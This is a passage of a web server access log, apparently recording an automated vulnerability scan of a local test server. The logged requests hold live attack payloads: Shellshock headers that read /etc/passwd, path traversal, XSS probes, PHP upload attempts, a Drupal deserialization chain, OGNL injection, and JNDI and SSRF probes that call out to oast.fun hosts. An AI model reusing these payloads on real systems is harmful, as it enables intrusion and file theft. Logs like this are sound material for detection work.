+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emswebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /os/mxperson HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22public\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v4/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.175","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/config.exp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x22297MTr17KkUtglXyqqqDD6YtUhL.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=297MTr17KkUtglXyqqqDD6YtUhL&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test-cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{ \x22link\x22: [ { \x22value\x22: \x22link\x22, \x22options\x22: \x22O:24:\x5C\x22GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5C\x22:2:{s:33:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CPsr7\x5C\x5CFnStream\x5Cu0000methods\x5C\x22;a:1:{s:5:\x5C\x22close\x5C\x22;a:2:{i:0;O:23:\x5C\x22GuzzleHttp\x5C\x5CHandlerStack\x5C\x22:3:{s:32:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000handler\x5C\x22;s:2:\x5C\x22id\x5C\x22;s:30:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000stack\x5C\x22;a:1:{i:0;a:1:{i:0;s:6:\x5C\x22system\x5C\x22;}}s:31:\x5C\x22\x5Cu0000GuzzleHttp\x5C\x5CHandlerStack\x5Cu0000cached\x5C\x22;b:0;}i:1;s:7:\x5C\x22resolve\x5C\x22;}}s:9:\x5C\x22_fn_close\x5C\x22;a:2:{i:0;r:4;i:1;s:7:\x5C\x22resolve\x5C\x22;}}\x22 } ], \x22_links\x22: { \x22type\x22: { \x22href\x22: \x22http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\x22 } } }","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /node/1?_format=hal_json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.181","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.xbean.propertyeditor.JndiConverter\x22,\x0D\x0A \x22AsText\x22:\x22rmi://c9v8h88smpv8c1ig07h054s91jh5frox8.oast.fun/exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"------WebKitFormBoundaryfcKRltGv\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.php\x22\x0D\x0AContent-Type: image/avif\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryfcKRltGv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Upload/upload_file.php?l=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"{\x0D\x0A \x22query\x22: \x22{\x5Cnusers {\x5Cnedges {\x5Cn node {\x5Cn username\x5Cn email\x5Cn avatarUrl\x5Cn status {\x5Cn emoji\x5Cn message\x5Cn messageHtml\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x5Cn }\x22,\x0D\x0A \x22variables\x22: null,\x0D\x0A \x22operationName\x22: null\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Upload/test/test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/get.php?subdomain=c9v8h88smpv8c1ig07h09zngj8g4mccn6.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/tree.php?subdomain=c9v8h88smpv8c1ig07h0xk96ix6irbcf8.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapp/?fccc%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console-selfservice/SelfService.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nextcloud/index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/designs/xh1x.childrenlist.json//%3Csvg%20onload=alert%28document.domain%29%3E.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"\x0D\x0A\x0D\x0Aextended_version\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fosagent/repl/download-file?basedir=4&filepath=..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fosagent/repl/download-snapshot?name=..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"297MTuhCQDNSAanMvbC03nYzNza.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php~ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.185","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:58 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 